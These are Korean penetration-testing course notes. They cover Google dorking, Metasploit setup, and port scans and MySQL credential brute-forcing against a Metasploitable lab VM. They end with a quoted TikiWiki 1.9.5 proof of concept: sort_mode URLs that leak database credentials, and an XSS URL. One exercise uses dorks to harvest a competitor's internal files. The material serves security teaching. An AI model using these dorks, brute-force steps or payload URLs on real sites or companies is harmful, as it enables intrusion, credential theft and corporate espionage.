20160525 정보수집단계
==================================================메 모==================================================
nmap 스캐너
nessus 취약점스캐너
http://whatis.techtarget.com/file-extension-list/A
보통 업데이트나 업그레이드를 하다가 실수로 중단하는 경우에 해결법이다.
$ sudo apt-get autoremove
$ sudo apt-get autoclean
$ sudo apt-get clean
프로그램을 제거하고 나서 해주면 좋다.
bind_tcp : 대상이 공인IP, 말뚝
reverse_tcp : 대상이 사설IP, 떡밥
================================================강의/실습================================================
구글링, 구글해킹, 구글핵
■ GHDB(Google Hack DB)
구글 검색을 통한 특정 자료나 치명적인 자료를 찾거나 구하는 방법, 해킹 취약점을 찾는 방법등에 관해 데이터베이스화 시켜 놓은 서비스이다.
http://www.exploit-db.com/google-dorks
■ GHDB Category
항목
설명
Footholds (31)
Examples of queries that can help a hacker gain a foothold into a web server
해커들이 웹서버에 접근 가능하게 연계
Files containing usernames (17)
These files contain usernames, but no passwords... Still, google finding usernames on a web site..
웹사이트에서 패스워드 설정이 안돼 있는 파일 검색
Sensitive Directories (74)
Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!
공유된 민감한 디렉토리들을 웹페이지에서 수집
Web Server Detection (72)
These links demonstrate Google's awesome ability to profile web servers..
웹 서버를 감지
Vulnerable Files (61)
HUNDREDS of vulnerable files that Google can find on websites...
수백만 개의 웹사이트 취약점을 검색
Vulnerable Servers (77)
These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.
특정 취약점이 있는 서버를 찾음. 또 따른 검색 방법은 '취약한 파일' 절에서 검색
Error Messages (77)
Really retarded error messages that say WAY too much!
다양한 에러 메세지 검출
Files containing juicy info (77)
No usernames or passwords, but interesting stuff none the less.
사용자 이름이나 패스워드를 몰라도 해킹이 가능
Files containing passwords (305)
PASSWORDS, for the LOVE OF GOD!!! Google found PASSWORDS!
구글에서 암호화된 파일을 검색
Sensitive Online Shopping Info (9)
Examples of queries that can reveal online shopping info like customer data, suppliers, orders, creditcard numbers, credit card info, etc
온라인 쇼핑시 사용되는 고객정보, 주문내역, 카드번호 등 민감한 정보들을 수집
Network or vulnerability data (63)
These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all sorts of fun stuff!
이 페이지는 방화벽 로고, 허니팟 로그등 네트워크 정보와 취약한 데이터를 포함
Pages containing login portals (284)
These are login pages for various services. Consider them the front door of a website's more sensitive functions.
로그인 페이지를 포함하고 있는 포털 사이트를 통해 해킹이 가능
Various Online Devices (242)
This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.
웹 페이지에서 프린터, 비디오 카메라 등 온라인 장치에 대한 정보를 수집
Advisories and Vulnerabilities (1971)
These searches locate vulnerable servers. These searches are often generated from various security advisory posts, and in many cases are product or version-specific.
취약한 서버를 찾는다. 여러가지 보안권고 게시물을 검색
[실습] GHDB의 다양한 점보를 검색하고 검색 패턴에 대한 정리를 한다.
- 다음 문서에 대한 내용을 참고한다.
- 구글검색을이용한해킹방어[심정재]
기본 검색 방법(http://www.google.co.kr)
● 가상화
● 가상화 .ppt
● 가상화 .pdf
● site:.redhat.com 에러메세지
● "server error"
● 가상화 AND centos
확장 검색 방법(http://www.google.co.kr)
● intitle:
● site:
● inurl:
● filetype:
● intext:
[정리] 구글 키워드 사용하는 방법(시간: 15분)
- www.exploit-db.com/google-dorks 사이트의 유용한 검색어 정리
- "구글검색을이용한해킹방어[심정재]"문서에서의 검색어 정리
[실습] 구글독 사이트에서 선택한 항목과 구글 웹사이트에서 직접 입력한것만 출력결과를 비교
- http://www.exploit-db.com/google-dorks
● intitle
● inurl
● site
● filetype
● intext
[실습] "구글 웹마스터 도구 > 콘텐츠 삭제 서비스" 신청 서비스 사용
- https://www.google.com/webmasters/tools/removals?hl=ko
- (시나리오) 자신의 정보를 검색하고 삭제 서비스를 사용하여 신청한다.
-> (주의) 웹페이지안의 내용을 잘 읽어야 한다.
[실습] 가상적인 시나리오를 만들고 다양한 테스트를 해 본다.
(주의) 반드시 검색 과정을 정리하면서 과정을 진행한다.
(예제1) 취약한 파일 검색
passwd
passwd.txt
shodow
shodow.txt
admin.txt
etc
(예제2)
www.exploit-db.com/google-dorks
-> 하단의 'category' 부분에서 'Files containing passwords' 선택하고
search 부분에는 'admin' 입력한다.
(가상 시나리오 1)
우리 회사와 경쟁 하는 회사의 정보를 획득 해 보자.
● site:example.com filetype:hwp 정부에 제한했던 제안서 파일들
● site:example.com filetype:pdf 발표용 자료들
● site:example.com filetype:ppt 발표용 자료들
● site:example.com filetype:xls 관리용 자료들
파일의 종류를 정리 해 보자.
[참고] 파일의 확장자 종류(http://www.terms.co.kr/filename-extensions.htm)
파일의 확장자
설명
비고
hwp
아래아한글 파일
pdf
어도비 애크로뱃 문서 형식 (Portable Document Format)
xls
마이크로소프트 엑셀 파일
ppt
마이크로소프트 파워포인트 파일
(가상 시나리오 2)
어떤 사이트에서 자신의 주민등록 번호를 사용하고 있는지 확인
site:example.com intext:581010-XXXXXXX
C:\Users\soldeskN\Desktop\JS\Security과정공유디렉토리(part1)\04_과정진행\02_2.1_모의해킹_침해대응_개요\02_정보수집단계\04_Metaspolit_Kali2.0.hwp
메타스플로잇(Metasploit)
1. 메타스플로잇(MSF(Metasploit, Meta Exploit Framework))
● 취약점 진단 통합 프레임워크
● MSF(Metasploit Framework)는 오픈 소스 도구로- 공격 코드- 페이로드- 인코더- 정찰 도구- 보안 테스팅등을 제공하는 일종의 체계이다.
● (초기버전) 단순한 공격 코드의 집합(현재버전) 광범위한 영역의 정보 탐색, 공격, 사전 침투에 관련된 보안 툴의 설계와 개발 능력 제공
● MSF(Meta Exploit Framework)는 새로운 공격 코드, 페이로드, 정보 탐색 도구들을 개발 할 수 있는 환경을 제공하는 최초이자 최고의 기반 프로그램이다.
● MSF는 새로운 보안 테스팅 기술의 개발과 보안 리서치를 가능하게 하는 도구, 관련 유틸리티들을 직접 솔게할 수 있는 기반을 제공한다.
● 유닉스, 리눅스, 윈도우, 맥 환경을 지원한다.
● 메타 익스플로잇은- 프로 버전(유료, 7일동안 무료사용)과- 커뮤니티 버전(무료)을 제공하고 있다.
● 칼리리눅스에서는 커뮤니티 버전이 포함되어 있다.
2. 칼리리눅스에서 커뮤티니 웹서비스 접근하기
Database(DB) : Oracle Oracle12c, IBM DB2, MS MS-SQL,
MySQL, PostgreSQL
(KaliLinux)
# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
# service metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
# firefox http://localhost:3790
사용자 생성 정보 입력
Username: <적당히> (EX: administrator)
Password: soldesk1.
Activation Code 입력
3. 메타스플로잇 구성 요소
MSFpayload
MSFencode
Auxiliary
■ MSFpayload
● 다른 프래임워크의 많은 익스플로잇과 실행가능한 파일, 쉘코드등을 만들 수 있게 도와준다.
● 쉘코드는 C, 루비(Ruby), 자바스크립트(JavaScript), 비주얼베이직(Visual Baic)등으로 만들수 있다.예) 파이썬(Python) 기반의 프로그램 검증이 필요하면 C 스타일로 작성하면 좋다.예) 브라우저 익스플로잇을 만들려면 자바스크립트 형식으로 만들면 좋다.
● 보통 명령어 수행시 도움말을 보고 싶다면 # msfpayload -h 수행하면 된다.
● 또는 msfcli 명령어의 옵션을 자세히 보고 싶다면 명령의 마지막 부분에 '0'이라고 입력하면 된다.# msfpayload windows/shell_reverse_tcp 0
■ MSFencode
● 메타스플로잇 개발자들은 인코딩을 통해 안티바이러스나 IDS등, bad characters를 회피할 수 있게 해준다.(예) @ cleartext : 표시할 때 설명이 필요 없는 텍스트, 즉 암호화 되지 않음 평문
● 보통 명령어 수행시 도움말을 보고 싶다면# msfencode -h
■ Auxiliary(조력자, 보조)
● 익스플로잇의 집합체(엄밀히 말해서 auxiliary는 익스플로잇이 포함되어 있지 않다.)이다.
● 18가지 정도로 분류되어 있다.
# cd /usr/share/metasploit-framework/modules/auxiliary
# ls
admin bnat crawler dos gather pdf server spoof voip
analyze client docx fuzzers parser scanner sniffer sqli vsploit
# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > show auxiliary
Auxiliary
=========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
admin/cisco/cisco_secure_acs_bypass normal Cisco Secure ACS Unauthorized Password Change
..... (중략) .....
msf > quit
[실습] 칼리 리눅스 사용하기 1
● zenmap을 통해 포트스캔된 정보를 mataspolit에서 읽어 들이기
(Metasploitable V2 Linux 정보 확인)
로그인 ID/PASS: msfadmin/msfadmin
$ ifconfig
$ netstat -nr
$ cat /etc/resolv.conf
$ uname -a
$ cat /etc/lsb-release (# ls /etc/*release)
VMware > Edit > Virtual Network Editor > VMnet8(NAT) > [ V ] Use local DHCP service to distribute IP address to VMs Metasploitable Linux 네트워크 정보 (주의) eth0 반드시 NAT로 변경(Host only -> NAT) IP: 192.168.10.134/24 defaultrouter: 192.168.10.2 DNS Server : 192.168.10.2
[참고] MetasploitableV2 서버 네트워크 설정
① nmap 프로그램을 통해 공격할려고 하는 시스템의 포트 스캔 과정을 거치고 파일로 저장한다.
(Kali Linux)
# zenmap &
-> 'Quick scan plus' 선택
-> IP : 192.168.10.134 /* Metasploitable V2 Linux's IP : 192.168.10.134 */
-> 스캔 결과를 파일로 저장: /root/scan1.xml
scan > save scan
-> 스캔 과정이 끝났다면 zenmap를 종료한다.
② DB(EX: msf) 초기화
# msfdb
Manage a metasploit framework database
msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
# cat /usr/share/metasploit-framework/config/database.yml
development:
adapter: postgresql
database: msf
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
production:
adapter: postgresql
database: msf
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
test:
adapter: postgresql
database: msf_test
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
[참고] 필요하면 명령어 수행
# service postgresql status
# service postgresql start
# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015102101 ]
+ -- --=[ 1496 exploits - 862 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > db_status
[*] postgresql connected to msf
msf >
③ 칼리리눅스에서 MSF console 접속한 후 이전에 저장된 파일(EX: scan1.xml)을 import 한다.
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
go_pro Launch Metasploit web GUI
grep Grep the output of another command
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf > db_import /root/scan1.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.1'
[*] Importing host 192.168.20.200
[*] Successfully imported /root/scan1.xml
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.20.200 00:0C:29:D1:CC:21 Linux CentOS server
msf > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.200 21 tcp ftp open vsftpd 2.0.5
192.168.20.200 22 tcp ssh open OpenSSH 4.3 protocol 2.0
192.168.20.200 23 tcp telnet open BSD-derived telnetd
192.168.20.200 25 tcp smtp open Sendmail 8.13.8/8.13.8
192.168.20.200 53 tcp domain open ISC BIND 9.3.6-20.P1.el5_8.6
192.168.20.200 80 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 110 tcp pop3 open Dovecot pop3d
192.168.20.200 111 tcp rpcbind open 2 RPC #100000
192.168.20.200 143 tcp imap open Dovecot imapd
192.168.20.200 443 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 993 tcp imap open Dovecot imapd
192.168.20.200 995 tcp pop3 open Dovecot pop3d
msf > notes
[*] Time: 2014-07-17 09:18:44 UTC Note: host=192.168.20.200 type=host.imported
data={:filename=>"/root/scan1.xml", :type=>"Nmap XML", :time=>2014-07-17 09:18:44 UTC}
[*] Time: 2014-07-17 09:18:45 UTC Note: host=192.168.20.200 type=host.os.nmap_fingerprint
data={:os_vendor=>"Linux", :os_family=>"Linux", :os_version=>"2.6.X", :os_accuracy=>100}
[*] Time: 2014-07-17 09:18:45 UTC Note: host=192.168.20.200 type=host.last_boot
data={:time=>"Thu Jul 17 15:44:09 2014"}
msf > search portscan /* 지원되는 스캔 방법의 종류 */
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set PORTS 1-500
PORTS => 1-500
msf auxiliary(syn) > set RHOSTS 192.168.10.134 /* Metasploitable V2 IP's 192.168.10.134 */
RHOSTS => 192.168.10.134
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.10.134:21
[*] TCP OPEN 192.168.10.134:22
[*] TCP OPEN 192.168.10.134:23
[*] TCP OPEN 192.168.10.134:25
[*] TCP OPEN 192.168.10.134:53
[*] TCP OPEN 192.168.10.134:80
[*] TCP OPEN 192.168.10.134:111
[*] TCP OPEN 192.168.10.134:139
[*] TCP OPEN 192.168.10.134:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) > quit
[실습] 칼리 리눅스 사용하기 2
● 메타스플로잇을 사용하여 취약점을 스캔 해 보자
● (전제조건) Metasploitable V2 Power ON 상태- VMware > Edit > Virtual Network Editor > VMnet8(NAT) > [ V ] Use local DHCP service to distribute IP address to VMs- Metasploitable Linux 네트워크 정보 (주의) eth0 반드시 NAT로 변경(Host only -> NAT) IP: 192.168.10.134/255.255.255.0 defaultrouter: 192.168.10.2 DNS Server : 192.168.10.2
(KaliLinux)
# nmap -sV 192.168.10.134
Starting Nmap 6.46 ( http://nmap.org ) at 2015-02-27 16:04 KST
Nmap scan report for 192.168.10.134
Host is up (0.00023s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
# msfconsole
msf > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in
the current database
DB_ALL_PASS false no Add all passwords in the current database
to the list
DB_ALL_USERS false no Add all users in the current database to
the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR
identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for
a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords
separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all
users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.10.134
RHOSTS => 192.168.10.134
msf auxiliary(mysql_login) > run
[*] 192.168.10.134:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[TERM2] 다른 윈도우에서 user.txt, pass.txt 파일을 생성
# cd /usr/share/metasploit-framework/data/wordlists
# vi user.txt
root
admin
administrator
# echo "" > pass.txt
#
-> Metaspolitable V2에서는 root 사용자의 암호가 없다.
msf auxiliary(mysql_login) > set USER_FILE
/usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(mysql_login) > set PASS_FILE
/usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(mysql_login) > run
[*] 192.168.10.134:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 192.168.10.134:3306 MYSQL - [1/3] - Trying username:'root' with password:''
[+] 192.168.10.134:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] 192.168.10.134:3306 MYSQL - [2/3] - Trying username:'admin' with password:''
[-] Access denied
[*] 192.168.10.134:3306 MYSQL - [3/3] - Trying username:'administrator' with password:''
[-] Access denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > quit
[실습] 칼리 리눅스 사용하기 2
● 메타스플로잇을 사용하여 취약점을 스캔 해 보자.
① 서버쪽에(Metaspolitable V2) 열러 있는 포트 목록 확인
# nmap -sV -p 1-65535 192.168.10.134
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-17 21:06 KST
Nmap scan report for 192.168.10.134
Host is up (0.00024s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42043/tcp open mountd 1-3 (RPC #100005)
48481/tcp open unknown
50478/tcp open status 1 (RPC #100024)
56189/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 seconds
-> 약간 시간이 걸림
# man nmap
-sV: Probe open ports to determine service/version info
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
② powerfuzzer를 사용하여 테스트
● powerfuzzer웹/애플리케이션상의 숨겨진 파일이나 디렉토리들을 부르트로스 방식으로 검출해 공격 팩터(Factor)를 찾는 멀티스레드 자바 애플리케이션이다.
(KaliLinux 에서 작업)
● KaliLinux에서 웹접속을 통한 MetaspolitV2 서버의 Tikiwiki 설정
# firefox http://192.168.10.134/tikiwiki/tiki-index.php
-> 'Go here to begin the installation process' 선택
-> 다음페이지에서
Database Type : MySQL
Host : localhost
User : root
Password :
Database name : tikiwiki195
-> 다음페이지에서
-> Create
-> 웹 브라우저 종료
[참고] 만약 Metaspolitable V2 서버에서 database 이름을 확인하기 위해서는
(Metasploitable V2 Server)
$ mysql -u root -p /* -u : username, -p : password */
Enter password: <ENTER>
mysql> show databases;
mysql> quit
$
③ KaliLinux에서 powerfuzzer 실행
KaliLinux > Web Applications > Web Application Fuzzy > powerfuzzer
or
KaliLinux > Vulnerability Analysis > Fuzzing Tools > powerfuzzer
툴의 하단 부분에
Target URL : http://192.168.10.134
Scan
-> 출력 결과를 분석하면 목록이 많이 나온다.
-> 이중에서 URL 하나를 선택하여 웹에서 접근해 보자
# firefox http://192.168.10.134/tikiwiki/tiki-index.php
-> 'Home Page' 보인다.
-> 만약 홈페이지가 보이지 않는다면 tiwiki 웹사이트에 대한 초기화가 이루어지지 않아서
그렇다. 그런경우 http://192.168.10.134/tikiwiki/tiki-index.php 사이트에 접속하여
다시 설정하여야 한다.
③ twiki 대상 웹 서비스 공격
최신 취약점을 확인하기 위해서 http://www.exploit-db.com에서 검색을 한다.
http://www.exploit-db.com 사이트에서
-> 오른쪽 상단의 'search'를 선택하고
-> Description 부분에 'tikiwiki' 입력한다.
-> 상당히 많은 버그가 있다는 것을 알수 있다.
-> 2004년 ~ 2010년까지의 결과 확인
웹페이지 출력 결과
Date D A V Description Plat. Author
2008-01-20 Exploit Code Downloads Download Vulnerable Application Waiting
verification TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability php
Sha0
2010-09-20 Exploit Code Downloads - Verified TikiWiki tiki-graph_formula Remote PHP Code Execution php metasploit
2010-07-25 Exploit Code Downloads - Verified TikiWiki jhot Remote Command Execution php metasploit
2010-03-09 Exploit Code Downloads - Verified TikiWiki Versions Prior to 4.2 Multiple Vulnerabilities php Mateusz Drygas
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability php iliz
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability php iliz
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability php iliz
2007-10-25 Exploit Code Downloads - Verified TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities php L4teral
2007-10-12 Exploit Code Downloads - Verified TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit php str0ke
2007-10-10 Exploit Code Downloads - Verified TikiWiki 1.9.8 - Remote PHP Injection Vulnerability php ShAnKaR
2006-11-01 Exploit Code Downloads - Verified TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability php securfrog
2006-09-02 Exploit Code Downloads - Verified TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit php rgod
2006-05-29 Exploit Code Downloads - Verified TikiWiki 1.9 tiki-lastchanges.php Multiple Parameter XSS php Blwood
2005-11-09 Exploit Code Downloads - Verified TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability php Moritz Naumann
..... (중략) .....
-> 2006-11-01 버그를 확인한다.
-> Sirius (sort_mode) Information Disclosure Vulnerability 선택한다.
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
a proof of concept is disponible here : http://cockor.free.fr/PoC.swf
there's also a xss here :
/tiki-featured_link.php?type=f&url="
